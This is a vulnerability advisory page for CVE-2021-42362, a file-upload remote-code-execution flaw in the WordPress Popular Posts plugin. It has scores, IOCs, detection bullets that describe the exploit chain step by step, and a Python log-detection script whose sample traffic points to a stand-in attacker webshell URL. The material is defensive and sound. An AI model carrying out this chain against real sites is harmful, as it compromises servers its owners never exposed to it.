cbcvebase.
CVE-2021-42362
published 2021-11-17

CVE-2021-42362: The WordPress Popular Posts WordPress plugin is vulnerable to arbitrary file uploads due to insufficient input file type validation found in the…

Priority: P2 · 78 · high · 8.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H
Exploit: public exploit available
EPSS: 79.82% (99.6th percentile)
The WordPress Popular Posts WordPress plugin is vulnerable to arbitrary file uploads due to insufficient input file type validation found in the ~/src/Image.php file which makes it possible for attackers with contributor level access and above to upload malicious files that can be used to obtain remote code execution, in versions up to and including 5.3.2.

Affected (2 ranges)

Vendor                          | Product                  | Version range | Fixed in
wordpress_popular_posts         | wordpress_popular_posts  | 0.0 – 5.3.2   | (not listed)
wordpress_popular_posts_project | wordpress_popular_posts  | <= 5.3.2      | (not listed)

Detection & IOCs (extracted from sources)

path: ~/src/Image.php
path: wp-content/uploads/wordpress-popular-posts/
url: wp-admin/options-general.php?page=wordpress-popular-posts&tab=debug
url: wp-admin/options-general.php?page=wordpress-popular-posts&tab=tools
url: index.php/wp-json/wordpress-popular-posts/v1/popular-posts
url: wp-admin/admin-ajax.php
filename: *.gif.php
command: action=wpp_clear_thumbnail
command: action=add-meta
other: metakeyselect=wpp_thumbnail
other: thumb_source=custom_field
bytes: GIF header prepended to PHP payload
  • Monitor POST requests to wp-admin/admin-ajax.php with action=add-meta and metakeyselect=wpp_thumbnail containing an external URL as the metavalue — this is the step that registers the remote shell URL as the post thumbnail custom field.
  • Alert on files with double extensions (e.g. .gif.php) appearing under wp-content/uploads/wordpress-popular-posts/ — the exploit drops the webshell there after the plugin fetches and saves the remote payload.
  • Detect outbound server-side HTTP requests originating from the WordPress process to external hosts for files with .gif.php or similar double-extension names — the plugin fetches the attacker-hosted payload automatically.
  • Flag POST requests to wp-admin/options-general.php?page=wordpress-popular-posts&tab=tools with body parameter thumb_source=custom_field — this reconfigures the plugin to accept arbitrary URLs for thumbnails, a prerequisite step in the exploit chain.
  • Detect HTTP requests with User-Agent 'Monies Browser 1.0' targeting WordPress login and admin endpoints — this is the hardcoded UA string used by the public exploit script.
  • Monitor POST requests to wp-admin/admin-ajax.php with action=wpp_clear_thumbnail — this cache-clearing step is performed by the exploit immediately before triggering the malicious thumbnail download.
  • Rapid repeated GET requests to the same post URL (10 times in quick succession) followed by POSTs to /wp-json/wordpress-popular-posts/v1/popular-posts with wpp_id matching that post — this is the view-inflation step used to push the malicious post into the top-5 widget.
  • The exploit requires the Metasploit payload server to be reachable on port 80, 443, or 8080 with a FQDN resolving to a non-RFC1918 address; monitor for WordPress servers making outbound connections to non-private IPs on these ports fetching image-like filenames.
  • The attacker must hold at least Contributor-level WordPress credentials; unauthenticated exploitation is not possible.
  • There is a ~90-second wait built into the exploit chain to allow the server-side Popular Posts cache (60 sec refresh) to expire before the widget loads and triggers the payload download.
  • The attacker-hosted payload server must respond to a HEAD request before the GET; defenders can use this two-phase fetch pattern as a detection signal.
  • Affects WordPress Popular Posts plugin versions up to and including 5.3.2 only.
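The request-side indicators above can be turned into a small rule set and run over traffic records. The block below is an added example, not code from the advisory, the plugin, or the public exploit script. It assumes request records of the kind a WAF or reverse proxy could export (method, path, merged query/body parameters, User-Agent, client address, timestamp); the field names, the `burst`/`window` thresholds, and the sample records are all constructed for illustration. It also adds two file-side checks for the double-extension name under the plugin upload directory and for the GIF-header-plus-PHP polyglot listed in the IOCs.

```python
"""Detection helpers for the CVE-2021-42362 exploit chain (WordPress Popular Posts <= 5.3.2).

Added example; not part of the advisory or the plugin. Record field names are assumptions.
"""
import re
from collections import defaultdict
from urllib.parse import urlparse

UPLOAD_DIR = "wp-content/uploads/wordpress-popular-posts/"
DOUBLE_EXT = re.compile(r"\.(gif|jpe?g|png)\.php$", re.IGNORECASE)  # e.g. shell.gif.php
EXPLOIT_UA = "Monies Browser 1.0"  # hardcoded UA of the public exploit script (from the IOC list)
GIF_MAGIC = (b"GIF87a", b"GIF89a")


def _is_external_url(value):
    p = urlparse(value or "")
    return p.scheme in ("http", "https") and bool(p.netloc)


def detect_requests(records, burst=10, window=60):
    """Return (rule, client, detail) tuples for each exploit-chain indicator seen in records."""
    alerts = []
    flagged_ua = set()
    gets = defaultdict(list)       # (client, path) -> timestamps of GETs (view inflation)
    api_posts = defaultdict(list)  # client -> timestamps of popular-posts API POSTs
    for r in records:
        method, path, p, client, ts = r["method"], r["path"], r["params"], r["client"], r["ts"]
        if r.get("ua") == EXPLOIT_UA and client not in flagged_ua:
            flagged_ua.add(client)
            alerts.append(("exploit-user-agent", client, EXPLOIT_UA))
        if method == "GET":
            gets[(client, path)].append(ts)
            continue
        if method != "POST":
            continue
        if path.endswith("/wp-admin/admin-ajax.php"):
            # Step that registers the remote shell URL as the wpp_thumbnail custom field.
            if (p.get("action") == "add-meta" and p.get("metakeyselect") == "wpp_thumbnail"
                    and _is_external_url(p.get("metavalue"))):
                alerts.append(("wpp-thumbnail-remote-url", client, p["metavalue"]))
            elif p.get("action") == "wpp_clear_thumbnail":
                alerts.append(("wpp-clear-thumbnail", client, path))
        elif (path.endswith("/wp-admin/options-general.php") and p.get("page") == "wordpress-popular-posts"
              and p.get("tab") == "tools" and p.get("thumb_source") == "custom_field"):
            # Reconfigures the plugin to take thumbnails from a custom field (arbitrary URL).
            alerts.append(("wpp-thumb-source-custom-field", client, path))
        elif path.endswith("/wp-json/wordpress-popular-posts/v1/popular-posts") and "wpp_id" in p:
            api_posts[client].append(ts)
    # View inflation: `burst` GETs to one post inside `window` seconds, followed by a
    # popular-posts API POST from the same client.
    for (client, path), stamps in gets.items():
        stamps.sort()
        for i in range(len(stamps) - burst + 1):
            last = stamps[i + burst - 1]
            if last - stamps[i] <= window and any(t >= last for t in api_posts.get(client, [])):
                alerts.append(("view-inflation", client, path))
                break
    return alerts


def suspicious_upload(path):
    """Double-extension filename under the plugin's upload directory."""
    return UPLOAD_DIR in path and DOUBLE_EXT.search(path) is not None


def is_gif_php_polyglot(data):
    """GIF signature at offset 0 with a PHP open tag somewhere after it."""
    return data.startswith(GIF_MAGIC) and b"<?php" in data


# Constructed sample traffic (not real logs): one attacker client walking the chain,
# plus one ordinary visitor. Query and body parameters are merged into `params`.
_A = "203.0.113.7"
SAMPLE = [
    {"ts": 0, "client": _A, "method": "POST", "path": "/wp-login.php", "params": {}, "ua": EXPLOIT_UA},
    {"ts": 5, "client": _A, "method": "POST", "path": "/wp-admin/options-general.php", "ua": EXPLOIT_UA,
     "params": {"page": "wordpress-popular-posts", "tab": "tools", "thumb_source": "custom_field"}},
    {"ts": 8, "client": _A, "method": "POST", "path": "/wp-admin/admin-ajax.php", "ua": EXPLOIT_UA,
     "params": {"action": "add-meta", "metakeyselect": "wpp_thumbnail",
                "metavalue": "http://attacker.example/x.gif.php"}},
    *[{"ts": 10 + i, "client": _A, "method": "GET", "path": "/index.php/2021/11/hello/",
       "params": {}, "ua": EXPLOIT_UA} for i in range(10)],
    {"ts": 21, "client": _A, "method": "POST", "ua": EXPLOIT_UA,
     "path": "/index.php/wp-json/wordpress-popular-posts/v1/popular-posts", "params": {"wpp_id": "42"}},
    {"ts": 25, "client": _A, "method": "POST", "path": "/wp-admin/admin-ajax.php", "ua": EXPLOIT_UA,
     "params": {"action": "wpp_clear_thumbnail"}},
    {"ts": 30, "client": "198.51.100.9", "method": "GET", "path": "/index.php/2021/11/hello/",
     "params": {}, "ua": "Mozilla/5.0"},
]

if __name__ == "__main__":
    for alert in detect_requests(SAMPLE):
        print(alert)
```

The User-Agent rule is reported once per client to keep it from drowning the stateful rules; the view-inflation rule deliberately waits for the API POST before firing, since a burst of GETs alone is ordinary crawler behaviour. The file checks are meant for a periodic scan of the upload directory rather than for request-time use.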

CVSS provenance

NVD · v3.1 · 8.8 HIGH · CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
NVD · v2.0 · 6.5 MEDIUM · AV:N/AC:L/Au:S/C:P/I:P/A:P